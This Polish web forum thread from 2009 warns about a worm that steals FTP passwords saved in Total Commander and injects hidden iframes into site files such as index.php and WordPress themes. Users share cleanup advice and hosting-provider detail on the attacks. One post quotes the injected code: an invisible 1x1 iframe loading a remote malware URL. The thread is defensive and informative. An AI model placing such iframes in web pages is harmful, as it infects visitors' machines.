|
|
phpBB2 by Przemo
Support forów phpBB2 modified by Przemo
|
|
[Problem] UWAGA ROBAK! |
Autor |
Wiadomość |
arcy
Pomógł: 509 razy Posty: 3761
|
Wysłany: 15-04-2009, 19:08 [Problem] UWAGA ROBAK!
|
|
|
UWAGA! Po sieci grasuje robak, który łączy się z serwerami FTP i infekuje strony internetowe.
Cytat: |
Szkodnik kradnie hasła z programu Total Commander po czym dodaje ukryte ramki, linki i złośliwy kod do plików index.php, index.html, main.php i wielu innych, które ma w definicjach.
Zagrożone są strony oparte na autorskich oraz popularnych skryptach, np. Wordpress. Użytkownicy tego ostatniego narzędzia mogą znaleźć złośliwy kod w szablonach w katalogu wp-content/themes/ oraz w innych plikach z ustawieniami konfiguracyjnym - ostrzega autor shpyo.net.
Po zainfekowaniu strony dostęp do niej zostaje zablokowany przez osłony sieciowe programów antywirusowych, a także przez wyszukiwarkę Google, która ostrzega o niebezpiecznej stronie.
Aby wyjaśnić sytuację i rozwiać ewentualne wątpliwości Dziennik Internautów skontaktował się z polskim przedstawicielem Total Commandera. Potwierdził on pojawienie się wyjątkowo aktywnego szkodnika, który faktycznie loguje się się na konta FTP i dodaje pewien fragment kodu do plików startowych.
- Jedynym bezpiecznym rozwiązaniem problemu jest usunięcie wirusa poprzez program antywirusowy a następnie zmiana haseł do swoich kont FTP. Problem zostanie rozwiązany w wersji 7.50 gdzie hasła do FTP będą zaszyfrowane algorytmem AES. Do czasu wydania finalnej nowej wersji zalecam niezapisywanie haseł w programie - radzi przedstawiciel programu Total Commander. |
Źródło: http://di.com.pl/news/263..._przez_FTP.html
Mieliśmy ostatnio zgłoszenia, w których do plików dopisywano IFRAME z linkiem typu www.googleads.biz
Cytat: | Złośliwy kod jest dodawany do wszystkich katalogów na serwerze do plików index.php, index.html, main.php. W samym kodzie źródłowym dołącza się na samym początku strony (przed !Doctype), zaraz po body, na końcu strony (po zamykającym tagu html) i przed ostatnim tagiem zamykającym body. Ponadto jeżeli używasz Wordpressa, to złośliwy kod jest dołączany do szablonów w katalogu wp-content/themes/ a nawet do innych plików z configami. U mnie był to np. wp-includes/default-filters.php
Co?
Dołączany jest niewidoczny iframe, który wygląda tak (oraz różne kombinacje):
Co się dzieje?
Wirus się rozprzestrzenia poprzez wyżej pokazany kod – to raz. Dwa – Google blokuje dostęp do strony przez wyszukiwarkę. Pojawia się komunikat, że „strona może wyrządzić szkody”. |
Źródło: <a href="http://blog.shpyo.net/?newsID=153">http://blog.shpyo.net/?newsID=153</a>
Robert napisał/a: | Szybkie rozwiązanie problemu: kontakt z hostingiem, poprosić o logi do ftp, sprawdzić kiedy akcja się zaczęła i poprosić o odtworzenie konta z backupu z dnia wcześniejszego. Wcześniej oczywiście trzeba usunąć paskudztwo z komputera i zmienić hasło do ftp. | >
Proszę uważać - zaktualizować swoje programy antywirusowe i nie przechowywać haseł w Total Commanderze - nie korzystać z opcji zapamiętania hasła!
Szczegółowe informacje o sposobie działania szkodnika znajdziecie na stronie http://www.cert.pl/news/1571
|
_________________ | Regulamin | F.A.Q. | Szukaj | Oficjalny podręcznik administratora phpBB2 by Przemo |
| arcy.net - nowości ze świata phpBB by Przemo, Opera, Android | w tym państwie pełnym nienawiści, rap po godzinach i luz ponad wszystkim... | Opera Browser | |
Ostatnio zmieniony przez arcy 24-05-2009, 17:03, w całości zmieniany 5 razy |
|
|
|
|
Gadatliwa Kasia
|
|
|
|
fastlone
Pomógł: 2 razy Posty: 136
|
Wysłany: 15-04-2009, 19:25
|
|
|
A dotyczy to File Zilli albo innych programów od FTP?
Czy tylko Total Commander? |
_________________ Zakaz Pisania v 2.0 |
|
|
|
|
arcy
Pomógł: 509 razy Posty: 3761
|
|
|
|
|
They2
Pomógł: 82 razy Posty: 1297
|
Wysłany: 15-04-2009, 20:18
|
|
|
fakt
naprawde lubie taki popularny program TC, dawny WC. |
_________________ Support | Pomoc | Modyfikacja | Zlecenie płatne - zapraszam na PW oraz pod moim adresem.
Nie udzielam w GG. |
|
|
|
|
nieoznakowane
Pomógł: 7 razy Posty: 101
|
Wysłany: 15-04-2009, 20:19
|
|
|
Polecam LINUX-a |
|
|
|
|
They2
Pomógł: 82 razy Posty: 1297
|
Wysłany: 15-04-2009, 20:20
|
|
|
arcy napisał/a: | TC - wirus najprawdopodobniej pobiera dane do logowania z pliku konfiguracyjnego Total Commandera. | z 2 plików ktore wiem gdzie to jest,
to w katalogu C:\WINDOWS w rozszerzeniu ini. |
_________________ Support | Pomoc | Modyfikacja | Zlecenie płatne - zapraszam na PW oraz pod moim adresem.
Nie udzielam w GG. |
|
|
|
|
arcy
Pomógł: 509 razy Posty: 3761
|
Wysłany: 15-04-2009, 20:33
|
|
|
nieoznakowane napisał/a: | Polecam LINUX-a | Gdyby Linux byłby tak samo popularny jak Windows też miałbyś podobne problemy. Czasy romantycznych hakerów się skończyły - teraz wirusy i trojany to biznes i pieniądze. A na niszowym systemie wiele nie zarobią. Tym bardziej, że ludzie używający Linuxa są zwykle bardziej świadomi kwesti bezpieczeństwa.
arcy napisał/a: | Problem zostanie rozwiązany w wersji 7.50 gdzie hasła do FTP będą zaszyfrowane algorytmem AES. |
|
_________________ | Regulamin | F.A.Q. | Szukaj | Oficjalny podręcznik administratora phpBB2 by Przemo |
| arcy.net - nowości ze świata phpBB by Przemo, Opera, Android | w tym państwie pełnym nienawiści, rap po godzinach i luz ponad wszystkim... | Opera Browser | |
|
|
|
|
arcy
Pomógł: 509 razy Posty: 3761
|
Wysłany: 15-04-2009, 20:46
|
|
|
Cytat: | Złośliwy kod jest dodawany do wszystkich katalogów na serwerze do plików index.php, index.html, main.php. W samym kodzie źródłowym dołącza się na samym początku strony (przed !Doctype), zaraz po body, na końcu strony (po zamykającym tagu html) i przed ostatnim tagiem zamykającym body. Ponadto jeżeli używasz Wordpressa, to złośliwy kod jest dołączany do szablonów w katalogu wp-content/themes/ a nawet do innych plików z configami. U mnie był to np. wp-includes/default-filters.php
Co?
Dołączany jest niewidoczny iframe, który wygląda tak (oraz różne kombinacje):
Kod: | <iframe src="http://cheapslotplay.cn/in.cgi?income48" width=1 height=1 style="visibility: hidden"></iframe> |
Co się dzieje?
Wirus się rozprzestrzenia poprzez wyżej pokazany kod – to raz. Dwa – Google blokuje dostęp do strony przez wyszukiwarkę. Pojawia się komunikat, że „strona może wyrządzić szkody”. |
Źródło: <a href="http://blog.shpyo.net/?newsID=153">http://blog.shpyo.net/?newsID=153</a>
Robert napisał/a: | Szybkie rozwiązanie problemu: kontakt z hostingiem, poprosić o logi do ftp, sprawdzić kiedy akcja się zaczęła i poprosić o odtworzenie konta z backupu z dnia wcześniejszego. Wcześniej oczywiście trzeba usunąć paskudztwo z komputera i zmienić hasło do ftp. | >
|
_________________ | Regulamin | F.A.Q. | Szukaj | Oficjalny podręcznik administratora phpBB2 by Przemo |
| arcy.net - nowości ze świata phpBB by Przemo, Opera, Android | w tym państwie pełnym nienawiści, rap po godzinach i luz ponad wszystkim... | Opera Browser | |
|
|
|
|
Seba123
Pomógł: 74 razy Posty: 868
|
Wysłany: 15-04-2009, 21:03
|
|
|
Filezilla również. |
_________________ Fejs |
|
|
|
|
Paszczak000
Pomógł: 317 razy Posty: 2898
|
Wysłany: 16-04-2009, 07:33
|
|
|
arcy napisał/a: | Gdyby Linux byłby tak samo popularny jak Windows też miałbyś podobne problemy. |
Jest bardziej popularny w rozwiązaniach serwerowych (a właśnie takie maszyny opłaca się atakować) i jakoś dalej się trzyma :] Poznaj architekturę systemów typu UNIX, Linux, Windows to zrozumiesz :] |
|
|
|
|
arcy
Pomógł: 509 razy Posty: 3761
|
Wysłany: 16-04-2009, 20:27
|
|
|
Paszczak000 napisał/a: | Poznaj architekturę systemów typu UNIX, Linux, Windows to zrozumiesz :] | Raczej mało prawdopodobne, przynajmniej za tego życia Jak Bóg da to się zreinkarnuję w postaci Linuksowego serwera Cóż, nie będę polemizował ze specjalistą, bo moja wiedza na te tematy jest o taka malutka Powiem tylko, że mnie Windows pasuje i mimo wielokrotnych prób i przymiarek do RedHata, Mandrivy i Ubuntu, mój XP nadal pozostaje dla mnie najwygodniejszy w codziennym użyciu. Mimo wirusów, trojanów i innego dziadostwa |
_________________ | Regulamin | F.A.Q. | Szukaj | Oficjalny podręcznik administratora phpBB2 by Przemo |
| arcy.net - nowości ze świata phpBB by Przemo, Opera, Android | w tym państwie pełnym nienawiści, rap po godzinach i luz ponad wszystkim... | Opera Browser | |
|
|
|
|
inwob
Posty: 49
|
Wysłany: 17-04-2009, 16:05
|
|
|
Chyba mojemu koledze to się przyczepiło bo strona zmienila układ ;d
Obniżyła się i cały układ się zepsół:) |
|
|
|
|
They2
Pomógł: 82 razy Posty: 1297
|
Wysłany: 17-04-2009, 20:43
|
|
|
Już jest dostępna wersja programu TC 7.50 Beta 1
http://www.ghisler.com/750beta.htm
na razie jest to wersja testowa. |
_________________ Support | Pomoc | Modyfikacja | Zlecenie płatne - zapraszam na PW oraz pod moim adresem.
Nie udzielam w GG. |
|
|
|
|
arcy
Pomógł: 509 razy Posty: 3761
|
Wysłany: 17-04-2009, 21:37
|
|
|
Bardzo ciekawy post na temat robaka na forum jednego z dostawców usług hostingowych + sporo innych linków -
http://forum.netlook.pl/index.php/topic,308.0.html
Cytat: | Niestety, codziennie informujemy o takim zagrożeniu przynajmniej 10-20 klientów, którzy używając nieświadomie TC narazili się na ataki w postaci modyfikacji stron WWW i dodania do nich ramek wbudowanych iframe lub skryptów javascript wywołujących zdalnie wirusa.
Mamy 100% pewność co do infekcji która przeprwadzana jest z winy programu Total Commander / Windows Commander, ale także podejrzenia infekcji w przypadku korzystania z innych programów FTP, jeżeli na komputerze ofiary jest zainstalowany wspomniany wirus / koń trojański. Wówczas hasło nawet niezapisane w programie FTP, podczas połączenia, jest przechwytywane i przesyłane do hakerów.
Rozwiązniem problemu jest:
1. korzystanie tylko z aktualnych, bezpiecznych programów FTP typu Filezilla lub CuteFTP
2. systematyczne (codzienne) skanowanie komputera programami antywirusowymi
3. niezapisywanie haseł w programach FTP lub innych niezabezpieczonych formach na komputerze
4. korzystanie z różnych haseł dostępu do różnych usług / serwerów
5. bezpieczeństwo sieci internetowej z której korzyta użytkownik (dotyczy szczególnie sieci lokalnych, w których z jednego łącza korzysta wiele komputerów - wówczas na łączu może być zainstalowany koń trojański do nasłuch haseł)
Nasze serwery mają zaimplementowane różnego rodzaju systemy wczesnego ostrzegania przed takimi atakami. Ataki dzielą się na kilka form, oto one:
1. ataki przewidywane, w których komputer zombie atakująy serwer FTP ofiary najpierw sprawdza czy serwer działa wgrywając specjalnie spreparowany plik testowy, a następnie od razu go usuwając - taki atak jest wykrywalny, w 80% można go wyeliminować
2. atak przewidywalny, w którym komputer zombie atakuje serwer FTP w celu zainstalowania na nim skryptu do wysyłania mass-mailingów spamowych bez wiedzy i zgody użytkownika - taki atak jest wykrywalny, w 70% można go wyeliminować
3. tzw. atak cichy - komputer zombie atakujący serwer FTP ofiary łączy się jednorazowo z tym serwerem, od razu w sposób autoryzowany, bez żadnych błędów, przy użyciu hasła wcześniej wykradzionego, pobiera a następnie praktycznie w tej samej chwili nadpisuje pliki indexowe lub inne pliki kodu strony - taki atak wykrywalny jest przez system zabezpieczeń dopiero po fakcie wystąpienia, w momencie skanowania już wgranych plików pod kątem obecności złośliwego kodu. Tego ataku nie można wyeliminować, a po wykryciu jedyne co może zrobić użytkownik to poprawić zmodyfikowane pliki aby nie zawierały złośliwego kodu
We wszystkich przypadkach obserwuje się całkowite zaprzestanie ataków na stronę WWW i FTP klienta po tym kiedy zostanie zmienione hasło dostępu do FTP. | >
|
_________________ | Regulamin | F.A.Q. | Szukaj | Oficjalny podręcznik administratora phpBB2 by Przemo |
| arcy.net - nowości ze świata phpBB by Przemo, Opera, Android | w tym państwie pełnym nienawiści, rap po godzinach i luz ponad wszystkim... | Opera Browser | |
Ostatnio zmieniony przez arcy 17-04-2009, 21:55, w całości zmieniany 1 raz |
|
|
|
|
Gadatliwa Kasia
|
|
|
|
_mateusz2
zbanowany
Posty: 88
|
Wysłany: 18-04-2009, 07:48
|
|
|
forum mojego kolegi to zatakowało ma to może być to HEUR:Trojan.Script.Iframer |
|
|
|
|
|
Nie możesz pisać nowych tematów Nie możesz odpowiadać w tematach Nie możesz zmieniać swoich postów Nie możesz usuwać swoich postów Nie możesz głosować w ankietach Nie możesz załączać plików na tym forum Możesz ściągać załączniki na tym forum
|
Dodaj temat do Ulubionych Wersja do druku
|
Kopiowanie wszelkich treści zawartych na forum, modyfikacji oraz instrukcji bez zgody administracji i autorów tematów/postów zabronione!
Powered by phpBB modified by Przemo © 2003 phpBB
| Strona wygenerowana w 0,13 sekundy. Zapytań do SQL: 12 | |
|
|